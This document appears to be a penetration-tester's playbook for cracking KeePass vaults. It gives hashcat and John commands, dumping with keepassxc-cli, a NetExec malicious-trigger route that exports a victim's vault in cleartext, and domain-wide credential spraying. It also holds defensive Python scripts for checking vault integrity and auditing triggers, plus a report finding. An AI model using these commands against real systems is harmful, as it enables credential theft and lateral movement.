You found a KeePass database (.kdbx — often mistyped .kxdb/kxdb). This is the “what do I do now” playbook. KeePass vaults are jackpots: one cracked master password usually yields many reusable credentials.

🛡️ Methodology Checklist

  • Got the file off the box? → Route A: crack offline
  • Pulled it over FTP? Use binary mode (binary then get) — ASCII mode silently corrupts the .kdbx
  • Still on the host with admin, and a user actively uses KeePass? → Route B: live trigger
  • Extract hash: keepass2john [FILE].kdbx > kp.hash
  • Crack: hashcat -m 13400 kp.hash rockyou.txt (or john kp.hash) — first try a targeted list built from clues you found (Password_Cracking_Wordlists_Rules)
  • Open the vault with the master password → dump every entry (keepassxc-cli ls -R)
  • Classify each recovered cred by likely scope (domain user? SQL-local? app/service?) before testing
  • Spray/reuse the recovered creds across the domain (NetExec_SMB_Recon)
  • No crack? → hunt the master password elsewhere (Credential_Hunting_Windows)

🎯 Operational Context

Use when: You discover a .kdbx file (spidered from a share, found in a home dir, in a backup, dropped on an anonymous FTP). Find them with nxc smb [TARGET] -u [USER] -p [PASS] --spider C$ --pattern ".kdbx" or dir /s *.kdbx / find / -name '*.kdbx'.

Transfer it correctly: Over FTP, switch to binary mode (binary/bin) before get — pulling a .kdbx in ASCII mode prints WARNING! bare linefeeds received in ASCII mode and quietly corrupts the file so it won’t parse/crack. Re-download in binary if you see that.

Think Dumber First: Pull the file, run keepass2john → crack. KeePass master passwords are frequently weak/reused — this cracks more often than you’d expect. Try a targeted wordlist built from clues found on the box (audit notes, training docs, password policy) before a generic rockyou run; a 50-line list often cracks instantly.

Skip when: You only have the .kdbx and the master password is strong — there’s no brute-force shortcut; pivot to finding the password (config, notes, reuse) instead.


⚡ Tactical Cheatsheet

Command → Tactical Outcome

  • nxc smb [TARGET] -u [USER] -p [PASS] --spider C$ --pattern ".kdbx"
    → Find .kdbx files on a share
  • keepass2john Shared.kdbx > kp.hash
    → Extract the master-password hash
  • hashcat -m 13400 kp.hash /usr/share/wordlists/rockyou.txt
    → Crack (KeePass hashcat mode)
  • john --wordlist=rockyou.txt kp.hash
    → Crack with John (alternative)
  • keepassxc-cli open Shared.kdbx
    → Open the vault headless (prompts for the master password)
  • keepassxc-cli ls -R Shared.kdbx
    → List all entries recursively (vaults nest entries in groups)
  • keepassxc-cli show -s Shared.kdbx "[GROUP]/[ENTRY]"
    → Show an entry with protected fields — use the full Group/Entry path
  • nxc smb [TARGET] -u [USER] -p [PASS] -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH="[XML]"
    → Live cleartext export (admin on host)

🔬 Deep Dive & Workflow

Route A — Offline crack (you have the file)

The default play once the .kdbx is on your attacker box.

# 1. Extract the hash (keepass2john ships with John-jumbo)
keepass2john Shared.kdbx > kp.hash
#    → if "keepass2john: command not found", try /usr/share/john/keepass2john or the *.py variant
 
# 2. Crack — KeePass = hashcat mode 13400 (covers KDBX 3.x and 4.x)
#    BEST FIRST MOVE: a targeted list from clues on the box (see Wordlists_Rules note below)
john --wordlist=targeted.txt kp.hash
#    fall back to rockyou if that misses:
hashcat -m 13400 kp.hash /usr/share/wordlists/rockyou.txt
#    or: john --wordlist=/usr/share/wordlists/rockyou.txt kp.hash
#    show it:  hashcat -m 13400 kp.hash --show   |   john --show kp.hash
 
# 3. Open the vault with the recovered master password and dump everything
keepassxc-cli ls -R Shared.kdbx                       # recursive — see every group/entry
keepassxc-cli show -s Shared.kdbx "IT/SQL Guest Access"   # -s reveals protected fields; use the full Group/Entry path

Build a targeted list from box context first. Audit reports, training docs, and policy files often hand you the password pattern (e.g. a SeasonYear! policy → Autumn2024!). A tiny generated list cracks the vault near-instantly where rockyou would grind. Example: for s in Spring Summer Autumn Fall Winter; do for y in $(seq 2018 2025); do printf '%s%s\n%s%s!\n' "$s" "$y" "$s" "$y"; done; done > targeted.txt. More patterns/rules: Password_Cracking_Wordlists_Rules.

The keepassxc-cli prompt is not a shell. cd, dir, and ls <group> don’t navigate like a filesystem — groups are just path prefixes. Run keepassxc-cli ls -R and keepassxc-cli show -s "<Group>/<Entry>" from your normal terminal, not from inside an interactive open session.

hashcat throws Salt-value exception / No hashes loaded? This is a well-known mode-13400 parser quirk on valid keepass2john output — hashcat doesn’t strip the username: prefix (Shared: here). Easiest fix: use John, which parses its own tool’s output cleanly. For hashcat, drop the prefix first: sed 's/^[^:]*://' kp.hash > kp_clean.hash, then hashcat -m 13400 kp_clean.hash …. ($keepass$*2*<rounds>*0*… = AES-KDF, well within John’s reach.)

KDBX4 / Argon2: if cracking stalls or keepass2john chokes, you have a modern KDBX4 (Argon2 KDF). Use a recent hashcat/John build (Argon2 support), or keepass4brute. Argon2 is slow by design — keep the wordlist tight.
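Two things above are worth checking programmatically before any cracking time is spent: whether a pulled .kdbx is actually intact (the ASCII-mode FTP problem), and which KDF and cost the vault uses (KDBX3 AES-KDF rounds versus KDBX4 Argon2). The following Python inspector is an added example written for this page; it is not part of keepass2john, hashcat or KeePassXC. It parses only the public outer header: signature, version, header fields, and on KDBX4 the SHA-256 that KeePass stores immediately after the header, which exposes transfer corruption without any password. The format constants and KDF UUIDs are the published KDBX ones; the constructed sample vaults, their KDF cost values, the placeholder cipher/IV bytes and the simulated text-mode transfer are assumptions for the demo. The same script, run over a share of vault files, lets a defender find KDBX3/AES-KDF vaults that are cheap to attack offline and should be migrated to KDBX4/Argon2.

```python
import hashlib
import struct
import sys
import uuid

# Public KDBX outer-header constants (KeePass 2.x format). Nothing below needs the master
# password: every check runs on the unencrypted header only.
KDBX_SIG1, KDBX_SIG2 = 0x9AA2D903, 0xB54BFB67
HDR_END, HDR_MASTER_SEED, HDR_TRANSFORM_ROUNDS, HDR_KDF_PARAMETERS = 0, 4, 6, 11  # 6: KDBX3 only, 11: KDBX4 only
VD_UINT32, VD_UINT64, VD_BYTES = 0x04, 0x05, 0x42          # VariantDictionary value-type tags
KDF_ARGON2D = uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c")
KDF_NAMES = {uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea"): "AES-KDF", KDF_ARGON2D: "Argon2d",
             uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6"): "Argon2id"}

def parse_variant_dict(buf: bytes) -> dict:
    """Decode a KDBX4 VariantDictionary (the encoding of the KdfParameters header field)."""
    (ver,) = struct.unpack_from("<H", buf, 0)
    if ver & 0xFF00 != 0x0100:
        raise ValueError("unsupported VariantDictionary version")
    pos, out = 2, {}
    while pos < len(buf) and buf[pos] != 0:            # a type byte of 0 terminates the dictionary
        vtype = buf[pos]
        (nlen,) = struct.unpack_from("<I", buf, pos + 1)
        name = buf[pos + 5:pos + 5 + nlen].decode()
        (vlen,) = struct.unpack_from("<I", buf, pos + 5 + nlen)
        raw = buf[pos + 9 + nlen:pos + 9 + nlen + vlen]
        pos += 9 + nlen + vlen
        if vtype == VD_UINT32:
            out[name] = struct.unpack("<I", raw)[0]
        elif vtype == VD_UINT64:
            out[name] = struct.unpack("<Q", raw)[0]
        else:
            out[name] = raw                            # $UUID, salt, and any type not decoded here
    return out

def inspect_kdbx(data: bytes) -> dict:
    """Return version, KDF and cost; on KDBX4 also verify the keyless header SHA-256.
    Raises ValueError for anything that is not an intact vault header."""
    if len(data) < 12 or struct.unpack_from("<II", data) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("bad KDBX signature: not a vault, or mangled in transfer")
    minor, major = struct.unpack_from("<HH", data, 8)
    size_fmt = "<BI" if major >= 4 else "<BH"          # field length is 4 bytes in KDBX4, 2 in KDBX3
    pos, fields, fid = 12, {}, None
    while fid != HDR_END:
        if pos + struct.calcsize(size_fmt) > len(data):
            raise ValueError("header runs past end of file (truncated or corrupted)")
        fid, flen = struct.unpack_from(size_fmt, data, pos)
        pos += struct.calcsize(size_fmt)
        if pos + flen > len(data):
            raise ValueError(f"header field {fid} runs past end of file (truncated or corrupted)")
        fields[fid], pos = data[pos:pos + flen], pos + flen
    info = {"version": f"{major}.{minor}"}
    if major >= 4:
        # KDBX4 writes SHA-256(header) right after the header: a corruption check that needs no key.
        if data[pos:pos + 32] != hashlib.sha256(data[:pos]).digest():
            raise ValueError("KDBX4 header SHA-256 mismatch: corrupted (e.g. ASCII-mode FTP pull)")
        kdf = parse_variant_dict(fields[HDR_KDF_PARAMETERS])
        info["kdf"] = KDF_NAMES.get(uuid.UUID(bytes=kdf["$UUID"]), "unknown")
        info["cost"] = {k: kdf[k] for k in ("R", "I", "M", "P") if k in kdf}  # rounds/iterations/memory/lanes
    else:
        info["kdf"] = "AES-KDF"                        # KDBX3 has no KDF choice, only a round count
        info["cost"] = {"R": struct.unpack("<Q", fields[HDR_TRANSFORM_ROUNDS])[0]}
    return info

def check_vault(data: bytes) -> dict:
    """Non-raising wrapper for batch use over many files: {'intact': bool, ...}."""
    try:
        return {"intact": True, **inspect_kdbx(data)}
    except (ValueError, KeyError, struct.error) as exc:
        return {"intact": False, "problem": f"{type(exc).__name__}: {exc}"}

def simulate_text_mode_transfer(data: bytes) -> bytes:
    """Model (assumption) of what a text-mode transfer does to binary data: every bare LF becomes CR LF."""
    return data.replace(b"\n", b"\r\n")

def build_sample_vault(major: int) -> bytes:
    """CONSTRUCTED sample: a well-formed outer header, then placeholder bytes where a real file
    carries the HMAC and encrypted payload. Not a real vault; nothing in it decrypts."""
    field = lambda fid, value: struct.pack("<BI" if major >= 4 else "<BH", fid, len(value)) + value
    hdr = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1 if major == 3 else 0, major)
    hdr += field(2, bytes(16)) + field(3, struct.pack("<I", 1))     # placeholder cipher UUID, gzip flag
    hdr += field(HDR_MASTER_SEED, bytes(range(32)))                 # contains 0x0A: a text-mode transfer mangles it
    if major >= 4:                                                  # Argon2d with constructed cost parameters
        kdf = struct.pack("<H", 0x0100)
        for name, vtype, raw in (("$UUID", VD_BYTES, KDF_ARGON2D.bytes), ("S", VD_BYTES, bytes(range(32, 64))),
                                 ("P", VD_UINT32, struct.pack("<I", 2)), ("M", VD_UINT64, struct.pack("<Q", 64 << 20)),
                                 ("I", VD_UINT64, struct.pack("<Q", 2)), ("V", VD_UINT32, struct.pack("<I", 0x13))):
            kdf += struct.pack("<BI", vtype, len(name)) + name.encode() + struct.pack("<I", len(raw)) + raw
        hdr += field(HDR_KDF_PARAMETERS, kdf + b"\x00")
    else:
        hdr += field(HDR_TRANSFORM_ROUNDS, struct.pack("<Q", 60000))
    hdr += field(7, bytes(12)) + field(HDR_END, b"\r\n\r\n")        # IV placeholder, then end-of-header
    trailer = hashlib.sha256(hdr).digest() + bytes(32) if major >= 4 else b""   # header hash + HMAC placeholder
    return hdr + trailer + b"<encrypted-payload-placeholder>"

if __name__ == "__main__":                             # python3 kdbx_inspect.py Shared.kdbx  (no arg: demo on samples)
    samples = [open(sys.argv[1], "rb").read()] if len(sys.argv) > 1 else [build_sample_vault(3), build_sample_vault(4)]
    for blob in samples:
        print(check_vault(blob), "| after text-mode transfer:", check_vault(simulate_text_mode_transfer(blob)))
```

Run it with no argument to see both constructed samples pass and then fail after the simulated text-mode transfer; run it with a file path to check a real .kdbx. Note that only KDBX4 carries the keyless header hash: on KDBX3 the script can only catch corruption that breaks the header layout, so a binary-mode re-download remains the safe fix when keepass2john or the vault tooling rejects a KDBX3 file.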

Route B — Live trigger (admin on the host, user actively uses KeePass)

No cracking needed: abuse a malicious KeePass trigger to export the DB in cleartext the next time the victim unlocks it. Full detail on NetExec_PostExploitation.

nxc smb [TARGET] -u [USER] -p [PASS] -M keepass_discover     # find DBs + the config XML
nxc smb [TARGET] -u [USER] -p [PASS] -M keepass_trigger \
  -o ACTION=ALL KEEPASS_CONFIG_PATH="[PATH_TO_KEEPASS_CONFIG_XML]"
# → wait for the victim to open KeePass, retrieve the exported cleartext, remove the trigger
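From the defender's side, the KeePass config XML named above is the artifact to audit, since a trigger-based export lives there in plain sight. The following Python checker is an added example written for this page (not a NetExec module and not KeePass code): it parses the TriggerSystem section of a KeePass.config.xml, compares trigger names against an allowlist, and flags any action whose parameters name a plaintext-format file or point at a temp/world-writable path. The sample config, its element layout, the GUID placeholders and the path/extension heuristics are constructed assumptions; compare them against a real config from your own estate before relying on the exact element names.

```python
import re
import xml.etree.ElementTree as ET

# CONSTRUCTED sample of the trigger section of a KeePass.config.xml. The element layout
# (Application/TriggerSystem/Triggers/Trigger with Events and Actions) is the assumed KeePass 2.x
# shape; all GUID values are placeholders, not the real event/action type identifiers.
SAMPLE_CONFIG = r"""<Configuration>
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Guid>PLACEHOLDER-TRIGGER-GUID-1</Guid>
          <Name>Monthly backup reminder</Name>
          <Enabled>true</Enabled>
          <Events><Event><TypeGuid>PLACEHOLDER-EVENT-GUID</TypeGuid><Parameters /></Event></Events>
          <Actions><Action><TypeGuid>PLACEHOLDER-ACTION-GUID</TypeGuid>
            <Parameters><Parameter>Remember to back up the vault</Parameter></Parameters></Action></Actions>
        </Trigger>
        <Trigger>
          <Guid>PLACEHOLDER-TRIGGER-GUID-2</Guid>
          <Name>export</Name>
          <Enabled>true</Enabled>
          <Events><Event><TypeGuid>PLACEHOLDER-EVENT-GUID</TypeGuid><Parameters /></Event></Events>
          <Actions><Action><TypeGuid>PLACEHOLDER-ACTION-GUID</TypeGuid>
            <Parameters><Parameter>C:\Users\Public\export.xml</Parameter><Parameter>KeePass XML (2.x)</Parameter></Parameters></Action></Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>
"""

# Heuristics (assumptions, tune to your estate): an action parameter that names a plaintext-format
# file, or points at a temp/world-writable directory, deserves a second look.
PLAINTEXT_FILE = re.compile(r"\.(xml|csv|txt|html?)$", re.IGNORECASE)
SUSPECT_PATH = re.compile(r"(\\Users\\Public\\|\\Temp\\|\\ProgramData\\|/tmp/)", re.IGNORECASE)

def audit_triggers(config_xml: str, baseline_names: set) -> list:
    """Return one finding per trigger that is unknown to the baseline or whose action parameters
    match the heuristics above. An empty list means nothing to review."""
    root = ET.fromstring(config_xml)
    system = root.find("./Application/TriggerSystem")
    findings = []
    if system is None:
        return findings
    for trigger in system.findall("./Triggers/Trigger"):
        name = (trigger.findtext("Name") or "").strip()
        enabled = (trigger.findtext("Enabled") or "true").strip().lower() == "true"
        params = [(p.text or "").strip() for p in trigger.findall("./Actions/Action/Parameters/Parameter")]
        reasons = []
        if name not in baseline_names:
            reasons.append("trigger name not in baseline")
        for p in params:
            if PLAINTEXT_FILE.search(p):
                reasons.append(f"action parameter names a plaintext-format file: {p}")
            if SUSPECT_PATH.search(p):
                reasons.append(f"action parameter points at a temp/world-writable path: {p}")
        if reasons:
            findings.append({"name": name, "enabled": enabled, "reasons": reasons})
    return findings

def trigger_system_enabled(config_xml: str) -> bool:
    """True when KeePass will run triggers at all; a disabled TriggerSystem closes this vector."""
    root = ET.fromstring(config_xml)
    return (root.findtext("./Application/TriggerSystem/Enabled") or "false").strip().lower() == "true"

if __name__ == "__main__":
    print("trigger system enabled:", trigger_system_enabled(SAMPLE_CONFIG))
    for f in audit_triggers(SAMPLE_CONFIG, baseline_names={"Monthly backup reminder"}):
        print(f"[{'enabled' if f['enabled'] else 'disabled'}] {f['name']!r}: " + "; ".join(f["reasons"]))
```

Feed it the real config path from each host (the per-user one and any enforced one) and keep the baseline in version control; a trigger that appears outside a change window, or that writes anywhere a low-privileged account can read, is the signal to pull the file for incident handling and to rotate the vault's contents.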

After you’re in — this is the real win

A vault is rarely a single credential. Dump every entry, then reuse:

  • Classify before you test. Not every entry is a domain login — a SQLGuest-style entry is likely SQL-local auth (nxc mssql … --local-auth), an FTP/WEB01 entry is service-scoped, etc. Test each cred against the service it actually belongs to; an SMB failure doesn’t invalidate a SQL/app credential.
  • Validate/spray the domain-shaped creds domain-wide: nxc smb [DC]/24 -u [USER_FILE] -p [PASS_FILE] --continue-on-success (NetExec_SMB_Recon).
  • Watch for admin/service accounts, SSH keys, and notes fields (people paste recovery codes there).

🛠️ Troubleshooting & Edge Cases

Problem → Cause → Fix

  • hashcat: Salt-value exception / No hashes loaded
    Cause: mode-13400 parser quirk + the username: prefix on the line
    Fix: Use John (john --wordlist=… kp.hash); for hashcat, strip the prefix: sed 's/^[^:]*://' kp.hash > kp_clean.hash
  • .kdbx won’t parse / keepass2john errors after an FTP pull
    Cause: Downloaded in ASCII mode (bare linefeeds warning) — file is corrupted
    Fix: Re-download in binary mode: binary (or bin) then get Shared.kdbx
  • John: Crash recovery file is locked: ~/.john/john.rec
    Cause: A previous John run is still alive or left a stale session
    Fix: Kill the old john process (or rm ~/.john/john.rec), then re-run
  • cd/dir/ls <group> do nothing in the CLI
    Cause: keepassxc-cli interactive prompt isn’t a filesystem shell
    Fix: Run keepassxc-cli ls -R / show -s "<Group>/<Entry>" from your normal terminal
  • keepass2john not found
    Cause: John-jumbo not installed / not on PATH
    Fix: sudo apt install john; or /usr/share/john/keepass2john
  • Hash extracts but won’t crack
    Cause: Strong/unique master password
    Fix: Stop brute-forcing; hunt the password (reuse, config, notes) — Credential_Hunting_Windows
  • keepass2john errors on the file
    Cause: KDBX4 (Argon2) on an old tool
    Fix: Recent John/hashcat, or keepass4brute
  • Cracked, but a key file is required
    Cause: Vault uses password + keyfile
    Fix: You also need the .key/.keyx file — hunt the same dirs/share
  • Cracking is extremely slow
    Cause: Argon2 KDF (by design)
    Fix: Tighten the wordlist; this is expected, not a bug

📝 Reporting Trigger

Finding Title: KeePass Vault with Weak Master Password Exposes Stored Credentials

Impact: A recovered .kdbx database protected by a weak/guessable master password was cracked offline, disclosing all stored credentials — enabling lateral movement and privilege escalation through credential reuse.

Root Cause: Weak KeePass master password; the vault stored in a location accessible to a lower-privileged user (open share, backup, home directory).

Recommendation: Enforce a strong, unique KeePass master password (and a key file for high-value vaults); restrict access to vault files; avoid storing .kdbx on shared/world-readable locations; rotate any credentials exposed by this finding.